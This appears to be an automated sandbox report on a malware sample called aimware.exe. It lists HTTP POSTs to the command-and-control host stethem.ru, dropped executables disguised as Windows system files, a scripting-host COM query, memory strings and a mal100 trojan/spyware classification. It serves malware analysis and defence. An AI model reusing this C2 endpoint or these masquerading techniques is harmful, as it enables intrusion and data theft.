Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1064Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: stethem.ru

Source: unknown

HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: SurrogatesessionRuntimeBrokerDhcp.exe, 00000004.00000002.1780550988.0000000003512000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003249000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003562000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.000000000398A000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.000000000332A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://stethem.ru
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003249000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://stethem.ru/
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003249000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003702000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.0000000003562000.00000004.00000800.00020000.00000000.sdmp, wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2912163322.000000000332A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://stethem.ru/ImageprocessLinuxgeneratorTestdleLocal.php
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: wDyQbcxdSUUjszASb.exe, 0000001D.00000002.2959005611.000000001EE92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: QKh80KSRWl.29.dr, HyN2kllOvC.29.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\aimware.exe

Code function: 0_2_00AB6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00AB6FAA

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSCF3A8C87A1D90404F9DF2BA668ED638.TMP			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSCF3A8C87A1D90404F9DF2BA668ED638.TMP

Jump to behavior

Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AB848E	0_2_00AB848E
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AC00B7	0_2_00AC00B7
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AC4088	0_2_00AC4088
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AB40FE	0_2_00AB40FE
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AD51C9	0_2_00AD51C9
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AC7153	0_2_00AC7153
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AB32F7	0_2_00AB32F7
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AC62CA	0_2_00AC62CA
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AC43BF	0_2_00AC43BF
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ABC426	0_2_00ABC426
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ABF461	0_2_00ABF461
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ADD440	0_2_00ADD440
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AC77EF	0_2_00AC77EF
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ADD8EE	0_2_00ADD8EE
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AB286B	0_2_00AB286B
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ABE9B7	0_2_00ABE9B7
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AE19F4	0_2_00AE19F4
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AC6CDC	0_2_00AC6CDC
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AC3E0B	0_2_00AC3E0B
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00AD4F9A	0_2_00AD4F9A
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ABEFE2	0_2_00ABEFE2
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BAB0D4C	4_2_00007FFD9BAB0D4C
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BAB0E43	4_2_00007FFD9BAB0E43
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BEAB860	4_2_00007FFD9BEAB860
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BEB6592	4_2_00007FFD9BEB6592
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BEB582F	4_2_00007FFD9BEB582F
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BEA8F68	4_2_00007FFD9BEA8F68
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BA90D4C	25_2_00007FFD9BA90D4C
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BA90E43	25_2_00007FFD9BA90E43
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BAA0BC6	25_2_00007FFD9BAA0BC6
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BAA10CD	25_2_00007FFD9BAA10CD
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BAC187A	25_2_00007FFD9BAC187A
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BAC1A1F	25_2_00007FFD9BAC1A1F
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BACE072	25_2_00007FFD9BACE072
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BA993A9	25_2_00007FFD9BA993A9
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BA9880F	25_2_00007FFD9BA9880F
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BA9968B	25_2_00007FFD9BA9968B
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BB0187A	27_2_00007FFD9BB0187A
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BB01A1F	27_2_00007FFD9BB01A1F
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BB0E072	27_2_00007FFD9BB0E072
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BAD0D4C	27_2_00007FFD9BAD0D4C
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BAD0E43	27_2_00007FFD9BAD0E43
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BAD93A9	27_2_00007FFD9BAD93A9
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BAD880F	27_2_00007FFD9BAD880F
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BAD968B	27_2_00007FFD9BAD968B
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAA93A9	28_2_00007FFD9BAA93A9
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAA880F	28_2_00007FFD9BAA880F
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAA968B	28_2_00007FFD9BAA968B
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAD187A	28_2_00007FFD9BAD187A
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAD1A1F	28_2_00007FFD9BAD1A1F
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BADE072	28_2_00007FFD9BADE072
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAA0D4C	28_2_00007FFD9BAA0D4C
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAA0E43	28_2_00007FFD9BAA0E43
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BA993A9	29_2_00007FFD9BA993A9
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BA9880F	29_2_00007FFD9BA9880F
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BA9968B	29_2_00007FFD9BA9968B
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BAC187A	29_2_00007FFD9BAC187A
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BAC1A1F	29_2_00007FFD9BAC1A1F
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BACE072	29_2_00007FFD9BACE072
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BA90D4C	29_2_00007FFD9BA90D4C
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BA90E43	29_2_00007FFD9BA90E43
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BE823FF	29_2_00007FFD9BE823FF
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BE88F68	29_2_00007FFD9BE88F68
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BE8C525	29_2_00007FFD9BE8C525
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BFA000A	29_2_00007FFD9BFA000A
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 34_2_00007FFD9BAD0D4C	34_2_00007FFD9BAD0D4C
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 34_2_00007FFD9BAD0E43	34_2_00007FFD9BAD0E43
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 35_2_00007FFD9BAD187A	35_2_00007FFD9BAD187A
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 35_2_00007FFD9BAD1A1F	35_2_00007FFD9BAD1A1F
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 35_2_00007FFD9BADE072	35_2_00007FFD9BADE072
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 35_2_00007FFD9BAA0D4C	35_2_00007FFD9BAA0D4C
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 35_2_00007FFD9BAA0E43	35_2_00007FFD9BAA0E43
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 35_2_00007FFD9BAA93A9	35_2_00007FFD9BAA93A9
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 35_2_00007FFD9BAA880F	35_2_00007FFD9BAA880F
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 35_2_00007FFD9BAA968B	35_2_00007FFD9BAA968B
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 37_2_00007FFD9BA90D4C	37_2_00007FFD9BA90D4C
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 37_2_00007FFD9BA90E43	37_2_00007FFD9BA90E43
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 38_2_00007FFD9BAA0D4C	38_2_00007FFD9BAA0D4C
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 38_2_00007FFD9BAA0E43	38_2_00007FFD9BAA0E43
Source: C:\Recovery\spoolsv.exe	Code function: 42_2_00007FFD9BB0187A	42_2_00007FFD9BB0187A
Source: C:\Recovery\spoolsv.exe	Code function: 42_2_00007FFD9BB01A1F	42_2_00007FFD9BB01A1F
Source: C:\Recovery\spoolsv.exe	Code function: 42_2_00007FFD9BB0E072	42_2_00007FFD9BB0E072
Source: C:\Recovery\spoolsv.exe	Code function: 42_2_00007FFD9BAD0D4C	42_2_00007FFD9BAD0D4C
Source: C:\Recovery\spoolsv.exe	Code function: 42_2_00007FFD9BAD0E43	42_2_00007FFD9BAD0E43
Source: C:\Recovery\spoolsv.exe	Code function: 42_2_00007FFD9BAD93A9	42_2_00007FFD9BAD93A9
Source: C:\Recovery\spoolsv.exe	Code function: 42_2_00007FFD9BAD880F	42_2_00007FFD9BAD880F
Source: C:\Recovery\spoolsv.exe	Code function: 42_2_00007FFD9BAD968B	42_2_00007FFD9BAD968B
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 43_2_00007FFD9BAD187A	43_2_00007FFD9BAD187A
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 43_2_00007FFD9BAD1A1F	43_2_00007FFD9BAD1A1F
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 43_2_00007FFD9BADE072	43_2_00007FFD9BADE072
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 43_2_00007FFD9BAA0D4C	43_2_00007FFD9BAA0D4C
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 43_2_00007FFD9BAA0E43	43_2_00007FFD9BAA0E43
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 43_2_00007FFD9BAA93A9	43_2_00007FFD9BAA93A9
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 43_2_00007FFD9BAA880F	43_2_00007FFD9BAA880F
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 43_2_00007FFD9BAA968B	43_2_00007FFD9BAA968B
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 44_2_00007FFD9BAC0D4C	44_2_00007FFD9BAC0D4C
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 44_2_00007FFD9BAC0E43	44_2_00007FFD9BAC0E43
Source: C:\Recovery\spoolsv.exe	Code function: 45_2_00007FFD9BAE187A	45_2_00007FFD9BAE187A
Source: C:\Recovery\spoolsv.exe	Code function: 45_2_00007FFD9BAE1A1F	45_2_00007FFD9BAE1A1F
Source: C:\Recovery\spoolsv.exe	Code function: 45_2_00007FFD9BAEE072	45_2_00007FFD9BAEE072
Source: C:\Recovery\spoolsv.exe	Code function: 45_2_00007FFD9BAB0D4C	45_2_00007FFD9BAB0D4C
Source: C:\Recovery\spoolsv.exe	Code function: 45_2_00007FFD9BAB0E43	45_2_00007FFD9BAB0E43
Source: C:\Recovery\spoolsv.exe	Code function: 45_2_00007FFD9BAB93A9	45_2_00007FFD9BAB93A9
Source: C:\Recovery\spoolsv.exe	Code function: 45_2_00007FFD9BAB880F	45_2_00007FFD9BAB880F
Source: C:\Recovery\spoolsv.exe	Code function: 45_2_00007FFD9BAB968B	45_2_00007FFD9BAB968B

Source: C:\Users\user\Desktop\aimware.exe	Code function: String function: 00ACEB78 appears 39 times
Source: C:\Users\user\Desktop\aimware.exe	Code function: String function: 00ACF5F0 appears 31 times
Source: C:\Users\user\Desktop\aimware.exe	Code function: String function: 00ACEC50 appears 56 times

Source: aimware.exe, 00000000.00000003.1663188363.0000000003295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs aimware.exe
Source: aimware.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs aimware.exe

Source: aimware.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SurrogatesessionRuntimeBrokerDhcp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wDyQbcxdSUUjszASb.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wDyQbcxdSUUjszASb.exe0.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: spoolsv.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wDyQbcxdSUUjszASb.exe1.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wDyQbcxdSUUjszASb.exe2.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@52/47@1/1

Source: C:\Users\user\Desktop\aimware.exe

Code function: 0_2_00AB6C74 GetLastError,FormatMessageW,

0_2_00AB6C74

